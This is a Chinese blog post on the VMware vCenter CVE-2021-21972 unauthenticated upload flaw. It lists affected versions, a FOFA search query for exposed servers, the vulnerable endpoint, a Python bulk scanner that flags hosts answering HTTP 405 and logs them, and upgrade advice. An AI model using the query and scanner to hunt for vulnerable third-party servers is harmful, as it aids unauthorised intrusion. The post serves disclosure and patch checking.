关于Vmware vcenter未授权任意文件上传漏洞(CVE-2021-21972)的问题
作者:MD@@nr丫卡uer 时间:2022-10-02 23:37:25
背景
CVE-2021-21972 vmware vcenter的一个未授权的命令执行漏洞。该漏洞可以上传一个webshell至vcenter服务器的任意位置,然后执行webshell即可。
影响版本
vmware:esxi:7.0/6.7/6.5
vmware:vcenter_server:7.0/6.7/6.5
漏洞复现 fofa查询
语法:title="+ ID_VC_Welcome +"
POC
https://x.x.x.x/ui/vropspluginui/rest/services/uploadova
使用https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC脚本批量验证
#-*- coding:utf-8 -*-
banner = """
888888ba dP
88 `8b 88
a88aaaa8P' .d8888b. d8888P .d8888b. dP dP
88 `8b. 88' `88 88 Y8ooooo. 88 88
88 .88 88. .88 88 88 88. .88
88888888P `88888P8 dP `88888P' `88888P'
ooooooooooooooooooooooooooooooooooooooooooooooooooooo
@time:2021/02/24 CVE-2021-21972.py
C0de by NebulabdSec - @batsu
"""
print(banner)
import threadpool
import random
import requests
import argparse
import http.client
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"
def get_ua():
first_num = random.randint(55, 62)
third_num = random.randint(0, 3200)
fourth_num = random.randint(0, 140)
os_type = [
'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
'(Macintosh; Intel Mac OS X 10_12_6)'
]
chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
'(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
)
return ua
def CVE_2021_21972(url):
proxies = {"scoks5": "http://127.0.0.1:1081"}
headers = {
'User-Agent': get_ua(),
"Content-Type": "application/x-www-form-urlencoded"
}
targetUrl = url + TARGET_URI
try:
res = requests.get(targetUrl,
headers=headers,
timeout=15,
verify=False,
proxies=proxies)
# proxies={'socks5': 'http://127.0.0.1:1081'})
# print(len(res.text))
if res.status_code == 405:
print("[+] URL:{}--------存在CVE-2021-21972漏洞".format(url))
# print("[+] Command success result: " + res.text + "\n")
with open("存在漏洞地址.txt", 'a') as fw:
fw.write(url + '\n')
else:
print("[-] " + url + " 没有发现CVE-2021-21972漏洞.\n")
# except Exception as e:
# print(e)
except:
print("[-] " + url + " Request ERROR.\n")
def multithreading(filename, pools=5):
works = []
with open(filename, "r") as f:
for i in f:
func_params = [i.rstrip("\n")]
# func_params = [i] + [cmd]
works.append((func_params, None))
pool = threadpool.ThreadPool(pools)
reqs = threadpool.makeRequests(CVE_2021_21972, works)
[pool.putRequest(req) for req in reqs]
pool.wait()
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-u",
"--url",
help="Target URL; Example:http://ip:port")
parser.add_argument("-f",
"--file",
help="Url File; Example:url.txt")
# parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
args = parser.parse_args()
url = args.url
# cmd = args.cmd
file_path = args.file
if url != None and file_path ==None:
CVE_2021_21972(url)
elif url == None and file_path != None:
multithreading(file_path, 10) # 默认15线程
if __name__ == "__main__":
main()
EXP 修复建议
vCenter Server7.0版本升级到7.0.U1c
vCenter Server6.7版本升级到6.7.U3l
vCenter Server6.5版本升级到6.5 U3n
来源:https://blog.csdn.net/weixin_44146996/article/details/114099275
标签:Vmware,vcenter,上传漏洞
0
投稿猜你喜欢
Windows 2000 安全检查清单-中级篇
2009-12-02 18:49:00
Linux基础之xargs命令的入门实例
2023-10-10 20:13:54
百度更新时间一览
2007-12-07 18:53:00
攻防:网站后门防范及安全配置
2009-12-24 09:21:00
Linux7.7设置交换分区SWAP的方法
2023-10-16 23:49:41
Linux 配置WWW服务器全攻略
2021-07-15 11:02:18
Linux alias命令编写
2023-09-18 21:45:26
老谢徒弟:网络营销 如何提高软文的杀伤力
2009-04-29 16:08:00
Godaddy的Linux虚拟主机JSP/Java的相关信息(Tomcat/JDK版本等) G
2010-05-07 12:57:00
中国网游业鼻祖十年发展回顾:万王之王启示录
2009-10-17 10:04:00
Google Sitemap制作完全攻略
2007-08-17 13:59:00
25个最佳的免费WordPress主题下载
2011-09-02 13:13:21
口碑式营销 向权威博客站投稿的十个技巧
2009-02-05 15:00:00
linux 程序安装目录/opt目录和/usr/local目录的区别
2023-08-31 21:40:09
Godaddy的VPS服务器怎么重启
2010-04-17 13:13:00
Discuz!7.0 安装图文教程
2009-02-15 09:50:00
搜索引擎优化SEO十大忌讳
2007-10-19 13:16:00
Ubuntu 20.04 开启隐藏录音降噪功能(推荐)
2023-07-06 19:37:39
windows2003不同版本的区别
2010-05-10 18:35:00
Linux中可以节省你时间的15个命令别名
2023-07-20 00:27:12
